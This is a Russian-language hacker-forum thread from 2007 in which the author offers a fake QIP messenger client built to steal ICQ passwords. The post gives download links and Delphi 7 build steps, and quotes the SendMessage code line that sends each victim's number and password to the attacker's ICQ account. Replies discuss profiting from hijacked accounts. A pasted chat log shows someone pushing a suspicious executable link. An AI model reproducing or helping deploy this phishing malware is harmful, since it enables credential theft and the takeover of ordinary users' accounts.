Фейк квипа для угона паролей! Функции: Отправка на ICQ number;password Всплывающее окно даже со звуком всё что надо можно дописать самому или укажите здесь я попробую c0ded by _NuClear ICQ:958-653 скачиваем здес: FuckQIPse (14.12.07 без протокола) FuckQIP SE(Старый с ICQ протоколом) Протокол Настройка фейка QIP (c0ded _NuClear). Скачала архив, установили DELPHI 7. Разархивировали в нужную папку например C:\FuckQIP\ Все файлы с каталога C:\FuckQIP\ICQClient Components\ копируем в папку Delphi7\Lib\ Запускаем Delphi7, закрываем пустой проект. Нажимаем Component – Install Component, в поле Unit file name: выбираем Delphi7\Lib\ICQClient.pas, нажимаем ОК, в окне сообщения жмем YES, нажимаем ОК. Окно Package dclusr.bpk закрываем нажимаем ОК. Компонент добавлен, он отображается на вкладке Samples, теперь можно открывать исходники квипа. Для отправки данных на номер ICQ нужно: ICQClient1.SendMessage(958653,ComboBox1.Text+';'+Ed it1.Text); Заменить на: ICQClient1.SendMessage(*********,ComboBox1.Text+'; '+Edit1.Text); Где ********* мой кривой девятизнак). Постучали ко мне в аську, вот и решил выложить, так как уже не в первый раз просят выложить, прошу качать с моей ссылки, так как за работу мне никто не платит, а Интернет пока не бесплатный, да и для вас разницы никакой… ) © _NuClear
Заметил, искал с пробелом.. ) но всё таки темку обновил протокол отдельно добавил, может кто то захочет написать свой клиент а не просто фейк.
Как получить выгоду?))Ну как как....у тебя в конечном итоге будет кип,который будет отсылать пасс он аси жертвы к тебе...вот она выгода...
аааааааааа)))))))))))))))))))знач пошло в массы)))) Ну не обязательно ж с ачата кто-нить...сорцы уже эти повсюду выложены
Первое и как на меня главное, про автора толком ничего сказать не могу, код мне пришлось переписывать, много чего менять так как в той версии что попала ко мне он отсылал пароль куда то на лево, плюс был на столько глючным… если автор объявиться то с удовольствием добавлю в топик. Теперь не мения важное, МНЕ ЛИЧНО пробовали подсунуть мой же фейк, я был под столом… 311714 (23:34:37 17/12/2007) http://www.rabotaj-v-internete.narod.ru/infium.exe 311714 (23:34:37 17/12/2007) на 311714 (23:34:37 17/12/2007) потом отпиши как тебе 958-653 (23:34:57 17/12/2007) я сказал исходники 311714 (23:35:26 17/12/2007) ну зайди сейчас в асю ту,мне сейчас твоё мнение надо 958-653 (23:36:11 17/12/2007) и не ехе, я что похож на лоха??? :-D Короче или исходники или просто в игнор все твои номера… 3 кажется… на счет зависания ничего сказать не могу такое может быть от проблем с виндовсом, у меня иногда на звере вылетал…